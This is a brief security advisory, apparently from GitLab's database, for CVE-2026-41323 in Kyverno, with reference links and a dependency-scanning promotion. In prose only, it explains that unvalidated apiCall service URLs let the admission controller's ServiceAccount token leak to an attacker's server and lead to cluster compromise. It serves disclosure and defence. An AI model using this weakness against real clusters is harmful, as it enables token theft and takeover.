CVE-2026-41323: Kyverno: ServiceAccount token leaked to external servers via apiCall service URL
(updated )
Kyverno’s apiCall feature in ClusterPolicy automatically attaches the admission controller’s ServiceAccount token to outgoing HTTP requests. The service URL has no validation — it can point anywhere, including attacker-controlled servers. Since the admission controller SA has permissions to patch webhook configurations, a stolen token leads to full cluster compromise.
References
- github.com/advisories/GHSA-f9g8-6ppc-pqq4
- github.com/kyverno/kyverno/commit/bc4f91c4801b1eaa2edc0a14e2f1b0af8cf0c1f5
- github.com/kyverno/kyverno/commit/c2eab00033e635bda4e4efb58c1b472b41728bb6
- github.com/kyverno/kyverno/commit/f70e8ac1e7acd2e3844f9553e4a884f07f953de0
- github.com/kyverno/kyverno/security/advisories/GHSA-f9g8-6ppc-pqq4
- nvd.nist.gov/vuln/detail/CVE-2026-41323
Code Behaviors & Features
Detect and mitigate CVE-2026-41323 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →